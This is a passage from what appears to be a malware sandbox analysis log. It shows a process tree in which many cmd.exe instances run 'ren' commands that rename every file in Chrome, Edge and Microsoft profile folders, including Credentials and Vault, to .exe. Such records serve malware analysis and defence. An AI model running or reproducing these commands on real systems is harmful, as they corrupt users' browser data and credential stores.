        PID:1368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\lo\*.*" "*.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\lt\*.*" "*.exe"
        5⤵
        
        PID:4844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\lv\*.*" "*.exe"
        5⤵
        
        PID:4120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ml\*.*" "*.exe"
        5⤵
        
        PID:1532
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\mn\*.*" "*.exe"
        5⤵
        
        PID:2728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\mr\*.*" "*.exe"
        5⤵
        
        PID:3304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ms\*.*" "*.exe"
        5⤵
        
        PID:2000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\my\*.*" "*.exe"
        5⤵
        
        PID:1032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ne\*.*" "*.exe"
        5⤵
        
        PID:3804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\nl\*.*" "*.exe"
        5⤵
        
        PID:3556
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\no\*.*" "*.exe"
        5⤵
        
        PID:4368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\pa\*.*" "*.exe"
        5⤵
        
        PID:116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\pl\*.*" "*.exe"
        5⤵
        
        PID:1876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\pt_BR\*.*" "*.exe"
        5⤵
        
        PID:4920
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\pt_PT\*.*" "*.exe"
        5⤵
        
        PID:1168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ro\*.*" "*.exe"
        5⤵
        
        PID:5072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ru\*.*" "*.exe"
        5⤵
        
        PID:1656
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\si\*.*" "*.exe"
        5⤵
        
        PID:2136
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\sk\*.*" "*.exe"
        5⤵
        
        PID:1536
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\sl\*.*" "*.exe"
        5⤵
        
        PID:3660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\sr\*.*" "*.exe"
        5⤵
        
        PID:2900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\sv\*.*" "*.exe"
        5⤵
        
        PID:1796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\sw\*.*" "*.exe"
        5⤵
        
        PID:3560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ta\*.*" "*.exe"
        5⤵
        
        PID:2000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\te\*.*" "*.exe"
        5⤵
        
        PID:2628
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\th\*.*" "*.exe"
        5⤵
        
        PID:4872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\tr\*.*" "*.exe"
        5⤵
        
        PID:1828
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\uk\*.*" "*.exe"
        5⤵
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\ur\*.*" "*.exe"
        5⤵
        
        PID:2200
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\vi\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\zh_CN\*.*" "*.exe"
        5⤵
        
        PID:924
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\zh_HK\*.*" "*.exe"
        5⤵
        
        PID:1776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\zh_TW\*.*" "*.exe"
        5⤵
        
        PID:4748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.80.1_0\_locales\zu\*.*" "*.exe"
        5⤵
        
        PID:4548
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*.*" "*.exe"
        5⤵
        
        PID:1940
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*.*" "*.exe"
        5⤵
        
        PID:3996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*.*" "*.exe"
        5⤵
        
        PID:1300
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"
        5⤵
        
        PID:4740
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\*.*" "*.exe"
        5⤵
        
        PID:2512
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\*.*" "*.exe"
        5⤵
        
        PID:3804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\*.*" "*.exe"
        5⤵
        
        PID:116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\*.*" "*.exe"
        5⤵
        
        PID:5020
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\*.*" "*.exe"
        5⤵
        
        PID:872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\*.*" "*.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\*.*" "*.exe"
        5⤵
        
        PID:4484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir\*.*" "*.exe"
        5⤵
        
        PID:4276
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"
        5⤵
        
        PID:4748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
        5⤵
        
        PID:1748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\*.*" "*.exe"
        5⤵
        
        PID:1552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\*.*" "*.exe"
        5⤵
        
        PID:4632
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\*.*" "*.exe"
        5⤵
        
        PID:3560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\*.*" "*.exe"
        5⤵
        
        PID:2228
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\*.*" "*.exe"
        5⤵
        
        PID:4908
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\*.*" "*.exe"
        5⤵
        
        PID:2428
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\*.*" "*.exe"
        5⤵
        
        PID:5084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\*.*" "*.exe"
        5⤵
        
        PID:2896
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\*.*" "*.exe"
        5⤵
        
        PID:2168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\*.*" "*.exe"
        5⤵
        
        PID:4000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\*.*" "*.exe"
        5⤵
        
        PID:4396
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\*.*" "*.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\*.*" "*.exe"
        5⤵
        
        PID:2984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\*.*" "*.exe"
        5⤵
        
        PID:3084
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\*.*" "*.exe"
        5⤵
        
        PID:580
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\*.*" "*.exe"
        5⤵
        
        PID:4500
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\*.*" "*.exe"
        5⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\*.*" "*.exe"
        5⤵
        
        PID:2672
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\*.*" "*.exe"
        5⤵
        
        PID:2628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\*.*" "*.exe"
        5⤵
        
        PID:2584
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\*.*" "*.exe"
        5⤵
        
        PID:2932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\*.*" "*.exe"
        5⤵
        
        PID:4132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\*.*" "*.exe"
        5⤵
        
        PID:5084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\*.*" "*.exe"
        5⤵
        
        PID:4720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\*.*" "*.exe"
        5⤵
        
        PID:1436
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64\*.*" "*.exe"
        5⤵
        
        PID:4508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"
        5⤵
        
        PID:2200
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\*.*" "*.exe"
        5⤵
        
        PID:4920
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1536
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\*.*" "*.exe"
        5⤵
        
        PID:5072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Credentials\*.*" "*.exe"
        5⤵
        
        PID:3440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\*.*" "*.exe"
        5⤵
        
        PID:5112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\*.*" "*.exe"
        5⤵
        
        PID:3080
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\*.*" "*.exe"
        5⤵
        
        PID:4860
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\*.*" "*.exe"
        5⤵
        
        PID:4772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\*.*" "*.exe"
        5⤵
        
        PID:5076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\*.*" "*.exe"
        5⤵
        
        PID:3048
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\*.*" "*.exe"
        5⤵
        
        PID:4324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\*.*" "*.exe"
        5⤵
        
        PID:64
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\*.*" "*.exe"
        5⤵
        
        PID:1240
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\*.*" "*.exe"
        5⤵
        
        PID:1168
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\*.*" "*.exe"
        5⤵
        
        PID:708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\*.*" "*.exe"
        5⤵
        
        PID:1680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\*.*" "*.exe"
        5⤵
        
        PID:3556
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\*.*" "*.exe"
        5⤵
        
        PID:1828
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\*.*" "*.exe"
        5⤵
        
        PID:2132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\*.*" "*.exe"
        5⤵
        
        PID:4760
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\*.*" "*.exe"
        5⤵
        
        PID:5072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\*.*" "*.exe"
        5⤵
        
        PID:3440
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\*.*" "*.exe"
        5⤵
        
        PID:1472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\*.*" "*.exe"
        5⤵
        
        PID:5096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\*.*" "*.exe"
        5⤵
        
        PID:560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\*.*" "*.exe"
        5⤵
        
        PID:1448
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\*.*" "*.exe"
        5⤵
        
        PID:2292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\*.*" "*.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2928
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\*.*" "*.exe"
        5⤵
        
        PID:4360
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\OriginTrials\*.*" "*.exe"
        5⤵
        
        PID:3988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved\*.*" "*.exe"
        5⤵
        
        PID:3648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\*.*" "*.exe"
        5⤵
        
        PID:1256
    - - C:\Windows\System32\cmd.exe
        
